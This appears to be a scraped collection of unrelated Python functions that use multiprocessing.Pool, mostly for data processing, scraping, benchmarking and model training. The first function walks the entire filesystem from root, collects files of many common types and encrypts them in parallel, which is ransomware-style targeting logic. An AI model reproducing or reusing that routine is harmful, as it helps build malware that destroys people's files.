def select_files(): ext = [".3g2", ".3gp", ".asf", ".asx", ".avi", ".flv", ".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg", ".rm", ".swf", ".vob", ".wmv" ".docx", ".pdf",".rar", ".jpg", ".jpeg", ".png", ".tiff", ".zip", ".7z", ".exe", ".tar.gz", ".tar", ".mp3", ".sh", ".c", ".cpp", ".h", ".gif", ".txt", ".py", ".pyc", ".jar", ".sql", ".bundle", ".sqlite3", ".html", ".php", ".log", ".bak", ".deb"] files_to_enc = [] for root, dirs, files in os.walk("/"): for file in files: if file.endswith(tuple(ext)): files_to_enc.append(os.path.join(root, file)) # Parallelize execution of encryption function over four subprocesses pool = Pool(processes=4) pool.map(single_arg_encrypt_file, files_to_enc)
def get_best_servers(server_list, ping_attempts, valid_protocols): manager = multiprocessing.Manager() best_servers = manager.dict() num_servers = len(server_list) num_processes = get_num_processes(num_servers) pool = multiprocessing.Pool(num_processes, maxtasksperchild=1) pool.map(partial(compare_server, best_servers=best_servers, ping_attempts=ping_attempts, valid_protocols=valid_protocols), server_list) pool.close() return best_servers
def close(self): try: logger.debug("Starting to close pooled producer") super(PooledKafkaProducer, self).close() assert self.message_buffer_size == 0 logger.debug("Closing the pool") self.pool.close() logger.debug("Pool is closed.") except: logger.error("Exception occurred when closing pooled producer.") raise finally: # The processes in the pool should be cleaned up in all cases. The # exception will be re-thrown if there is one. # # Joining pools can be flaky in CPython 2.6, and the message buffer # size is zero here, so terminating the pool is safe and ensure that # join always works. self.pool.terminate() self.pool.join()
def download_chapter_m(self): ''' ??????????? Download all pages of the chapter using multiprocessing ''' results=[] if not self.pages: print('No page') return None mp=Pool(min(8,max(cpu_count(),4))) for page in self.pages: results.append(mp.apply_async(self.download_page,(page,))) mp.close() mp.join() num=sum([result.get() for result in results]) print('Downloaded {} pages'.format(num))
def main(): global ARGS parser = argparse.ArgumentParser(description='Run a PyWebRunner YAML/JSON script.') parser.add_argument('-b', '--browser', help='Which browser to load. Defaults to Chrome.') parser.add_argument('--base-url', help='Base URL to use with goto command.') parser.add_argument('-t', '--timeout', help='Global wait timeout (in seconds). Defaults to 30.') parser.add_argument('-p', '--processes', help='Number of processes (browsers) to use. Defaults to 1') parser.add_argument('-do', '--default-offset', help='New default offset for scroll_to_element. (Default is 0)') parser.add_argument('--errors', dest='errors', action='store_true', help='Show errors.') parser.add_argument('--focus', dest='focus', action='store_true', help='Focus the browser on launch.') parser.add_argument('-v', '--verbose', dest='verbose', action='store_true', help='Verbose output of commands being executed.') parser.add_argument('files', nargs='*') ARGS = parser.parse_args() processes = ARGS.processes or 1 pool = Pool(int(processes)) pool.map(run_test, ARGS.files) pool.close() pool.join()
def multiprocess_find_blocks(profiles, window, n_blocks=None, block_size=None, n_jobs=-1): """Find blocks in profiles (parallel version).""" intervals = compute_intervals( size=len(profiles), n_blocks=n_blocks, block_size=block_size) if n_jobs == -1: pool = mp.Pool() else: pool = mp.Pool(n_jobs) results = [apply_async(pool, serial_find_blocks, args=(dict(profiles.items()[start:end]), window)) for start, end in intervals] dicts = [p.get() for p in results] pool.close() pool.join() blocks = {k: v for d in dicts for k, v in d.items()} return blocks
def townsend_lombscargle_wrapper(task): ''' This wraps the function above for use with mp.Pool. task[0] = times task[1] = mags task[2] = omega ''' try: return townsend_lombscargle_value(*task) # if the LSP calculation fails for this omega, return a npnan except Exception as e: return npnan
def calculate(self, *, equation : str): '''Calculator''' #_equation = re.sub("[^[0-9]+-/*^%\.]", "", equation).replace('^', "**") #words replacements = {"pi" : "math.pi", 'e' : "math.e", "sin" : "math.sin", "cos" : "math.cos", "tan" : "math.tan", '^' : "**"} allowed = set("0123456789.+-*/^%()") for key, value in replacements.items(): equation = equation.replace(key, value) equation = "".join(character for character in equation if character in allowed) print("Calculated " + equation) with multiprocessing.Pool(1) as pool: async_result = pool.apply_async(eval, (equation,)) future = self.bot.loop.run_in_executor(None, async_result.get, 10.0) try: result = await asyncio.wait_for(future, 10.0, loop = self.bot.loop) await self.bot.embed_reply("{} = {}".format(equation, result)) except discord.errors.HTTPException: await self.bot.embed_reply(":no_entry: Output too long") except SyntaxError: await self.bot.embed_reply(":no_entry: Syntax error") except ZeroDivisionError: await self.bot.embed_reply(":no_entry: Error: Division by zero") except (concurrent.futures.TimeoutError, multiprocessing.context.TimeoutError): await self.bot.embed_reply(":no_entry: Execution exceeded time limit")
def get_all_features_m(data): """ returns a vector with extraced features :param data: datapoints x samples x dimensions (dimensions: EEG,EMG, EOG) """ p = Pool(3) t1 = p.apply_async(feat_eeg,(data[:,:,0],)) t2 = p.apply_async(feat_eog,(data[:,:,1],)) t3 = p.apply_async(feat_emg,(data[:,:,2],)) eeg = t1.get(timeout = 1200) eog = t2.get(timeout = 1200) emg = t3.get(timeout = 1200) p.close() p.join() return np.hstack([eeg,emg,eog])
def create_kernels(concurrency, parallel=False): kernel_ids = [] times_taken = [] if parallel: pool = multiprocessing.Pool(concurrency) results = pool.map(run_create_kernel, range(concurrency)) for t, kid in results: times_taken.append(t) kernel_ids.append(kid) else: for _idx in range(concurrency): t, kid = run_create_kernel(_idx) times_taken.append(t) kernel_ids.append(kid) print_stat('create_kernel', times_taken) return kernel_ids
def execute_codes(kernel_ids, parallel=False): times_taken = [] if parallel: pool = multiprocessing.Pool(len(kernel_ids)) results = pool.map(run_execute_code, kernel_ids) for t in results: if t is not None: times_taken.append(t) else: for kid in kernel_ids: t = run_execute_code(kid) if t is not None: times_taken.append(t) print_stat('execute_code', times_taken)
def restart_kernels(kernel_ids, parallel=False): times_taken = [] if parallel: pool = multiprocessing.Pool(len(kernel_ids)) results = pool.map(run_restart_kernel, kernel_ids) for t in results: if t is not None: times_taken.append(t) else: for kid in kernel_ids: t = run_restart_kernel(kid) if t is not None: times_taken.append(t) print_stat('restart_kernel', times_taken)
def destroy_kernels(kernel_ids, parallel=False): times_taken = [] if parallel: pool = multiprocessing.Pool(len(kernel_ids)) results = pool.map(run_destroy_kernel, kernel_ids) for t in results: if t is not None: times_taken.append(t) else: for kid in kernel_ids: t = run_destroy_kernel(kid) if t is not None: times_taken.append(t) print_stat('destroy_kernel', times_taken)
def __init__(self, manager, config, timer, base_dir, backup_dir, tailed_oplogs, backup_oplogs): super(Resolver, self).__init__(self.__class__.__name__, manager, config, timer, base_dir, backup_dir) self.tailed_oplogs = tailed_oplogs self.backup_oplogs = backup_oplogs self.compression_supported = ['none', 'gzip'] self.resolver_summary = {} self.resolver_state = {} self.running = False self.stopped = False self.completed = False self._pool = None self._pooled = [] self._results = {} try: self._pool = Pool(processes=self.threads(None, 2)) except Exception, e: logging.fatal("Could not start oplog resolver pool! Error: %s" % e) raise Error(e)
def __init__(self, manager, config, timer, base_dir, backup_dir, **kwargs): super(Rsync, self).__init__(self.__class__.__name__, manager, config, timer, base_dir, backup_dir, **kwargs) self.backup_location = self.config.backup.location self.backup_name = self.config.backup.name self.remove_uploaded = self.config.upload.remove_uploaded self.retries = self.config.upload.retries self.thread_count = self.config.upload.threads self.rsync_path = self.config.upload.rsync.path self.rsync_user = self.config.upload.rsync.user self.rsync_host = self.config.upload.rsync.host self.rsync_port = self.config.upload.rsync.port self.rsync_ssh_key = self.config.upload.rsync.ssh_key self.rsync_binary = "rsync" self.rsync_flags = ["--archive", "--compress"] self.rsync_version = None self._rsync_info = None self._pool = Pool(processes=self.threads())
def fit(self, X_train, y_train, X_test=None, y_test=None): """ """ if (X_test is None) and (y_test is None): X_test = X_train y_test = y_train elif (X_test is None) or (y_test is None): raise MissingValueException("Need to provide 'X_test' and 'y_test'") fun = partial(objective, deepcopy(self.model), deepcopy(self.model_module), deepcopy(self.eval_func), X_train, y_train, X_test, y_test) pool = Pool(self.n_jobs) scores = pool.map(fun, deepcopy(self.grid)) self.hyperparam_history = scores best_params, best_model = self.get_best_params_and_model() return best_params, best_model
def __call__(self, process_func): def wrapper(*args): data_obj = args[1] if (len(data_obj.shape) <= self.input_dim or data_obj.shape[-1] == 1): return process_func(*args) else: pool = mp.Pool(mp.cpu_count())# TODO: make configurable arglist = [ (args[0],) + (data_obj[...,i],) + args[2:] for i in range(data_obj.shape[-1]) ] result = pool.map(self.worker, arglist) if self.output_dim > self.input_dim: # expanding return np.stack(result, -1) else: # contracting return np.concatenate(result, -1) return wrapper
def _multitest_binary_pov(self, pov_path, cb_path, enable_randomness, debug, bitflip, timeout, times): pool = Pool(processes=4) res = [pool.apply_async(self._test_binary_pov, (pov_path, cb_path, enable_randomness, debug, bitflip, timeout)) for _ in range(times)] results = [ ] for r in res: try: results.append(r.get(timeout=timeout + 5)) except TimeoutError: results.append(False) return results
def batch_files(pool_size, limit): """ Create batches of files to process by a multiprocessing Pool """ batch_size = limit // pool_size filenames = [] for i in range(pool_size): batch = [] for j in range(i*batch_size, (i+1)*batch_size): filename = 'numbers/numbers_%d.txt' % j batch.append(filename) filenames.append(batch) return filenames
def __init__(self, map_func, reduce_func, num_workers=None): """ map_func Function to map inputs to intermediate data. Takes as argument one input value and returns a tuple with the key and a value to be reduced. reduce_func Function to reduce partitioned version of intermediate data to final output. Takes as argument a key as produced by map_func and a sequence of the values associated with that key. num_workers The number of workers to create in the pool. Defaults to the number of CPUs available on the current host. """ self.map_func = map_func self.reduce_func = reduce_func self.pool = multiprocessing.Pool(num_workers)
def multi_scrub_text(reviews): ''' Function to lemmatize text - utilizes multiprocessing for parallelization INPUT: reviews: array-like, pandas DataFrame column containing review texts OUTPUT: lemmatized: pandas DataFrame column with cleaned texts ''' lemmatized = [] cpus = cpu_count() - 1 pool = Pool(processes=cpus) lemmatized = pool.map(lemmatize_text, reviews) pool.close() pool.join() return lemmatized
def multi_core_scrape(num_pages, db_coll): ''' Map the API scrape across number of processors - 1 for performance boost. INPUT: num_pages: int, number of pages to scrape db_coll: pymongo collection object, collection to add documents to OUTPUT: None, records inserted into MongoDB ''' cpus = cpu_count() - 1 pool = Pool(processes=cpus) pages = range(1, num_pages + 1) employers = pool.map(scrape_api_page, pages) pool.close() pool.join() print 'Inserting Employer Records into MongoDB . . .' pbar = ProgressBar() for page in pbar(employers): db_coll.insert_many(page)
def predict_tf_all(path = None): result_list = [] p = m_Pool(31) result_list = p.map(predict_tf_once,range(1,32)) p.close() p.join() print 'writing...' result_df = pd.DataFrame(index = range(1)) for day,result in result_list: day_s = str(day) if len(day_s)<=1: day_s = '0'+day_s result_df['201610'+day_s] = result result_df = result_df.T result_df.columns = ['predict_power_consumption'] if path == None: date = str(pd.Timestamp(time.ctime())).replace(' ','_').replace(':','_') path = './result/'+date+'.csv' result_df.to_csv(path,index_label='predict_date') l = map(lambda day:pd.DataFrame.from_csv('./result/predict_part/%d.csv'%day),range(1,32)) t = pd.concat(l) t.to_csv('./result/predict_part/'+date+'.csv')
def make_month_features_all(): pw_df_list = [] dataset = get_dataset() dataset.power_consumption = dataset.power_consumption.apply(np.log) for user_id in get_user_id_list(): print user_id if not check_empty(user_id): user_df = filter_user_id(dataset,user_id).resample('1D').mean().fillna(0) #add to list pw_df_list.append((user_id,user_df)) #make_features(user_id,user_df) p = m_Pool(64) for arg in pw_df_list: #p.apply_async(make_features,args=(arg)) p.apply_async(make_month_features,args=(arg)) print 'Waiting for all subprocesses done...' p.close() p.join()
def make_history_month_features_all(): pw_df_list = [] dataset = get_dataset() dataset.power_consumption = dataset.power_consumption for user_id in get_user_id_list(): print user_id if not check_empty(user_id): user_df = filter_user_id(dataset,user_id).resample('1D').mean().fillna(1) #add to list pw_df_list.append((user_id,user_df)) #make_features(user_id,user_df) p = m_Pool(64) for arg in pw_df_list: p.apply_async(make_history_month_features,args=(arg)) print 'Waiting for all subprocesses done...' p.close() p.join()
def _reset(self): ''' Set up some book-keeping variables for optimization. Don't call this manually. ''' # Set up some variables for book-keeping self.epoch = 0 self.best_val_acc = 0 self.best_params = {} self.loss_history = [] self.val_acc_history = [] self.train_acc_history = [] self.pbar = None # Make a deep copy of the optim_config for each parameter self.optim_configs = {} self.params, self.grad_params = self.model.get_parameters() # self.weights, _ = self.model.get_parameters() for p in range(len(self.params)): d = {k: v for k, v in self.optim_config.iteritems()} self.optim_configs[p] = d self.multiprocessing = bool(self.num_processes-1) if self.multiprocessing: self.pool = mp.Pool(self.num_processes, init_worker)
def classify(self,X,Y, use_normalized=True, mask=None): if self._use_whitened_similarity: self.precompute_marginals() self._pool = Pool(initializer=init_worker, initargs=(self._num_instances, self._conv_param.kernel_h, self._conv_param.kernel_w, self._conv_param.pad[0], self._conv_param.stride[0], self._im2col_indices, self._pdfs)) probs, preds = self.collect_probs(X, Y, use_normalized, mask=mask) self._prob_mat = probs self._Y_hat = preds self._Y = Y self._tested = True if self._use_whitened_similarity: self._pool.close() self._pool.join() self._pool = None self._pdfs = None
def runBlast(fastaFilePath,blastFilePath,blastCLine,numThreads): '''Run blast comparing every database against every other in fastaFilePath. Save to the directory indicated by blastFilePath, using the blast parameters in blastCLine.''' # format the databases dbFileL=glob.glob(fastaFilePath) formatDb(dbFileL) # create blast directory # if directory for blast doesn't exist yet, make it blastDir = blastFilePath.split("*")[0] if glob.glob(blastDir)==[]: os.mkdir(blastDir) clineL = makeBlastClineList(dbFileL,fastaFilePath,blastFilePath,blastCLine) p=Pool(numThreads) stderrL = p.map(subprocessWrapper, clineL) return
def process_images(delete_existing=False, only_process_patient=None): if delete_existing and os.path.exists(settings.VALIDATION_EXTRACTED_IMAGE_DIR): print("Removing old stuff..") if os.path.exists(settings.VALIDATION_EXTRACTED_IMAGE_DIR): shutil.rmtree(settings.VALIDATION_EXTRACTED_IMAGE_DIR) if not os.path.exists(settings.VALIDATION_EXTRACTED_IMAGE_DIR): os.mkdir(settings.VALIDATION_EXTRACTED_IMAGE_DIR) # os.mkdir(settings.VALIDATION_EXTRACTED_IMAGE_DIR + "_labels/") for subject_no in range(settings.VAL_SUBSET_START_INDEX, settings.VAL_SUBSET_TRAIN_NUM): src_dir = settings.RAW_SRC_DIR + "val_subset0" + str(subject_no) + "/" src_paths = glob.glob(src_dir + "*.mhd") if only_process_patient is None and True: pool = multiprocessing.Pool(8) pool.map(process_image, src_paths) else: for src_path in src_paths: print(src_path) if only_process_patient is not None: if only_process_patient not in src_path: continue process_image(src_path)
def process_images(delete_existing=False, only_process_patient=None): if delete_existing and os.path.exists(settings.TRAIN_EXTRACTED_IMAGE_DIR): print("Removing old stuff..") if os.path.exists(settings.TRAIN_EXTRACTED_IMAGE_DIR): shutil.rmtree(settings.TRAIN_EXTRACTED_IMAGE_DIR) if not os.path.exists(settings.TRAIN_EXTRACTED_IMAGE_DIR): os.mkdir(settings.TRAIN_EXTRACTED_IMAGE_DIR) os.mkdir(settings.TRAIN_EXTRACTED_IMAGE_DIR + "_labels/") for subject_no in range(settings.TRAIN_SUBSET_START_INDEX, settings.TRAIN_SUBSET_TRAIN_NUM): src_dir = settings.RAW_SRC_DIR + "train_subset0" + str(subject_no) + "/" src_paths = glob.glob(src_dir + "*.mhd") if only_process_patient is None and True: pool = multiprocessing.Pool(6) pool.map(process_image, src_paths) else: for src_path in src_paths: print(src_path) if only_process_patient is not None: if only_process_patient not in src_path: continue process_image(src_path)
def save_images(nifti_files, anat, roi_dict, out_dir, **kwargs): '''Saves multiple nifti images using multiprocessing. Uses `multiprocessing`. Args: nifti_files (list): list of nifti file paths. anat (nipy.core.api.image.image.Image): anatomical image. roi_dict (dict): dictionary of cluster dictionaries. out_dir (str): output directory path. **kwargs: extra keyword arguments. ''' p = mp.Pool(30) idx = [int(f.split('/')[-1].split('.')[0]) for f in nifti_files] args_iter = itertools.izip(nifti_files, itertools.repeat(anat), [roi_dict[i] for i in idx], [path.join(out_dir, '%d.png' % i) for i in idx], idx) p.map(save_helper, args_iter) p.close() p.join()
def multiprocess_csv_import(work_list, settings, logger): pool = multiprocessing.Pool(processes=settings['max_concurrent_processes']) num_jobs = len(work_list) results = pool.imap_unordered(run_csv_import_multiprocessing, [[w, settings] for w in work_list]) pool.close() pool.join() result_list = list(results) num_results = len(result_list) if num_jobs > num_results: logger.warning("\t- A MULTIPROCESSING PROCESS FAILED WITHOUT AN ERROR\nACTION: Check the record counts") for result in result_list: if result != "SUCCESS": logger.info(result)
def multiprocess_list(mp_type, work_list, settings, logger): pool = multiprocessing.Pool(processes=settings['max_concurrent_processes']) num_jobs = len(work_list) if mp_type == "sql": results = pool.imap_unordered(run_sql_multiprocessing, [[w, settings] for w in work_list]) else: results = pool.imap_unordered(run_command_line, work_list) pool.close() pool.join() result_list = list(results) num_results = len(result_list) if num_jobs > num_results: logger.warning("\t- A MULTIPROCESSING PROCESS FAILED WITHOUT AN ERROR\nACTION: Check the record counts") for result in result_list: if result != "SUCCESS": logger.info(result)
def multiprocess_shapefile_load(work_list, settings, logger): pool = multiprocessing.Pool(processes=settings['max_concurrent_processes']) num_jobs = len(work_list) results = pool.imap_unordered(intermediate_shapefile_load_step, [[w, settings] for w in work_list]) pool.close() pool.join() result_list = list(results) num_results = len(result_list) if num_jobs > num_results: logger.warning("\t- A MULTIPROCESSING PROCESS FAILED WITHOUT AN ERROR\nACTION: Check the record counts") for result in result_list: if result != "SUCCESS": logger.info(result)
def check_data_valid(data, startval, endval=None): if endval is None: endval = len(data) chunksize = 10000000 startval = int(startval) endval = int(endval) offsets = np.arange(0, len(data), chunksize) args = [] result = True for offset in offsets: s = startval + offset e = min(s + chunksize, endval) nelems = e - s test_chunk = data[offset:offset + nelems] args.append((s, e, test_chunk)) pool = mp.Pool() result = all(pool.map(_check_chunk, args)) pool.terminate() return result
def metrics(period, resolution, tag, threads, metricsfile): try: pool = Pool(processes=threads) period_seconds = period * 3600 resolution_seconds = resolution * 3600 if metricsfile: with open(metricsfile) as fp: m = json.loads(fp.read().replace('][', ',')) else: m = metrics_api.get_tag_metrics(tag_name=tag, **context.settings) click.echo(click.style('Found: %s metrics', fg='green') % (len(m))) expire = partial(_expire_metric_path, period_seconds, resolution_seconds, tag) expired_paths = tqdm(pool.imap_unordered(expire, m)) expired_paths = sum(filter(None, expired_paths)) click.echo(click.style('Expired: %s metric paths', fg='green') % expired_paths) except Exception, e: print 'Cleanup metrics failed. %s' % e finally: pool.terminate() pool.join()
def easy_par(f, sequence): from multiprocessing import Pool poolsize=len(sequence) if poolsize > 16: poolsize = 16 pool = Pool(processes=poolsize) try: # f is given sequence. guaranteed to be in order cleaned=False result = pool.map(f, sequence) cleaned = [x for x in result if not x is None] #cleaned = asarray(cleaned) # not optimal but safe except KeyboardInterrupt: pool.terminate() except Exception as e: print('got exception: %r' % (e,)) if not args.force: print("Terminating the pool") pool.terminate() finally: pool.close() pool.join() return cleaned
def load_bundle(filename, regex="^\d+", chunk=None): """ Load graphs from zip archive """ pool = Pool() archive = zf.ZipFile(filename) # Determine entries and select subset if requested entries = archive.namelist() if chunk: entries = list(set(entries) & set(chunk)) entries = [(archive, entry) for entry in entries] # Load entries in parallel func = partial(load_bundle_entry, regex=re.compile(regex)) items = pool.map(func, entries) items = filter(lambda (g, l): g is not None, items) graphs, labels = zip(*items) archive.close() pool.close() pool.join() return graphs, labels
def fun_page(page_id,onoma): pp= Pool(50) mega_list = [] start = time.time() pst = p(page_id,access_token) n = 50 group_post = group(pst,n) temp = 0 for j in group_post: temp += len(j) print(str(temp)+'/'+str(len(pst))) re = pp.map(pros,list(j)) for jj in re: mega_list.append(jj) duration = (time.time()-start)/float(60) print ("Time:"+str(duration)+'min') with open(onoma,'w') as f: json.dump(mega_list,f) return mega_list
def query_shards(self, query): """ Return the result of applying shard[query] for each shard in self.shards, as a sequence. If PARALLEL_SHARDS is set, the shards are queried in parallel, using the multiprocessing module. """ args = zip([query] * len(self.shards), self.shards) if PARALLEL_SHARDS and PARALLEL_SHARDS > 1: logger.debug("spawning %i query processes" % PARALLEL_SHARDS) pool = multiprocessing.Pool(PARALLEL_SHARDS) result = pool.imap(query_shard, args, chunksize=1 + len(args) / PARALLEL_SHARDS) else: # serial processing, one shard after another pool = None result = imap(query_shard, args) return pool, result
def process_pool(): p=Pool(10) start=time.time() #q1=Queue.Queue() manager=Manager() q=manager.Queue() print "main start ",start for i in xrange(10): p.apply_async(sub_pool,args=(q,)) p.close() p.join() end=time.time() print "process done at ",end #print q print q.get() ''' while q1.empty() ==False: d= q1.get(True) print d '''
def pool_map(): x=[i for i in range (50) if i%2==0] #print x start=time.time() ''' for i in x: single(i) print "time used " , time.time()-start ''' #using multiprocess p=Pool(2) s=p.map(single,x) p.close() p.join() print s print len(s) print "end. Time used: ",time.time()-start
def transTest(): #??????????CPU???? numprocs = 8 #?4????4???????4? pool = multiprocessing.Pool(processes=numprocs) #pool.apply_async(func =tts_baidu.fileToVoice , args=("BBCHeadline.txt","BBCHeadline.wav","en")) #pool.apply_async(func =tts_baidu.fileToVoice , args=("1984.txt","1984.wav","en")) #pool.apply_async(func =tts_baidu.fileToVoice , args=("emma.txt","emma.wav","en")) #pool.apply_async(func =tts_baidu.fileToVoice , args=("Home.2009.eng.txt","Home.2009.eng.wav","en")) #pool.apply_async(func =tts_baidu.fileToVoice , args=("StrayBirds.txt","StrayBirds.wav","en")) #pool.apply_async(func =tts_baidu.fileToVoice , args=("????.txt","????.wav","zh")) #pool.apply_async(func =tts_baidu.fileToVoice , args=("???????.txt","???????.wav","zh")) #pool.apply_async(func =tts_baidu.fileToVoice , args=("????????.txt","????????.wav","zh")) pool.apply_async(func =tts_baidu.fileToVoice , args=("????.txt","????.wav","zh")) #pool.apply_async(func =tts_baidu.fileToVoice , args=("????????.txt","????????.wav","zh")) #pool.apply_async(func =tts_baidu.fileToVoice , args=("???????.txt","???????.wav","zh")) #pool.apply_async(func =tts_baidu.fileToVoice , args=("??????.txt","??????.wav","zh")) pool.close() pool.join()
def trans_novs(): # 249 novals gaga #??????????CPU???? count =0 numprocs = 8 #?4????4???????4? pool = multiprocessing.Pool(processes=numprocs) files = os.listdir("./nov") for filename in files: if not os.path.isdir(filename): if filename.endswith("txt"): fname = "./nov/"+filename #print fname pool.apply_async(func =tts_baidu.fileToVoice , args=(fname,fname+".wav","zh")) pool.close() pool.join() #print "finish all ,total handle TTS GET() :",count
def main(): input_dir, output_dir = getDirs() table_list = listFiles(input_dir) concurrency = cpu_count() print 'Using {0:d} Processes'.format(concurrency) pool = Pool(concurrency) # perform the passed in write action (function) for each csv row time_capture = TimeCapture(time.time()) results = pool.map( multiprocess, izip(repeat(output_dir), [copy.deepcopy(time_capture) for i in range(len(table_list))], table_list, repeat(write))) time_capture.end(1) pool.close() pool.join() print 'Finished Successfully!' displayResults(results, time_capture.total_time)
def get_dissimilarity_matrix(U,V,X,n,error_list,beta,alpha_w,alpha_e_avg_t,alpha_n0,maxconn): row_size = X.shape[0] col_size = X.shape[1] channel_count = X.shape[2] alpha = get_alpha(n,error_list,alpha_w,alpha_e_avg_t,alpha_n0) cluster_number = V.shape[0] D = np.zeros((row_size,col_size,cluster_number)) index_arr = np.array([[k,l] for k in xrange(row_size) for l in xrange(col_size)],dtype='int32') U_new = U.reshape(row_size*col_size,cluster_number, order='F') data_inputs = [0 for i in xrange(0,row_size*col_size)] for i in xrange(0, row_size*col_size): x = index_arr[i][0] y = index_arr[i][1] data_inputs[i] = [U_new,V,X[x][y],x,y,alpha,beta[x*row_size+y,:]] pool = Pool(maxconn) outputs = pool.map(compute_cluster_distances_pool, data_inputs) pool.close() pool.join() for i in xrange(0,row_size*col_size): x = index_arr[i][0] y = index_arr[i][1] D[x][y] = outputs[i] return D
def load_files_parallel(feature_files, load_function, processes, **kwargs): """ Function for loading feature files in parallel. :param feature_files: The collection of files to load. :param load_function: The function used to load the objects. :param processes: The number of processes to use for loading the feature files. :param kwargs: Keyword arguments which will be sent to the load function. :return: A list of loaded feature data frames or numpy arrays. """ logging.info("Reading files in parallel") pool = multiprocessing.Pool(processes) try: #Create a partial function with the keyword arguments set. This is done since the parallel map from # multiprocessing expects a function which takes a single argument. partial_load_and_pivot = partial(load_function, **kwargs) segment_frames = pool.map(partial_load_and_pivot, feature_files) finally: pool.close() return segment_frames
def parallel_jaccard_similarity(self,x,y): p = 16 pool = mp.Pool(processes= p) chunk_X = [] chunk_Y = [] for i in range(0, len(x), p): chunk_X.append(x[int(i):int((i+1)*p)]) chunk_Y.append(y[int(i):int((i+1)*p)]) s = time.clock() intersection_cardinality = sum(pool.starmap(self.interc_card_locl, zip(chunk_X,chunk_Y))) union_cardinality = sum(pool.starmap(self.union_card_locl, zip(chunk_X,chunk_Y))) print(intersection_cardinality, union_cardinality) e = time.clock() print("Parallel Jaccard Exec Time: ", e-s) return intersection_cardinality/float(union_cardinality)
def boot(self): p = Pool(self.cores) result = p.map(self.do_work, range(self.br)) p.close() p.join() return result
def jk(self): p = Pool(self.cores) base = np.arange(0, len(self.data)) self.indices = list(np.delete(base, i) for i in base) result = p.map(self.do_work_jk, range(self.br)) p.close() p.join() return result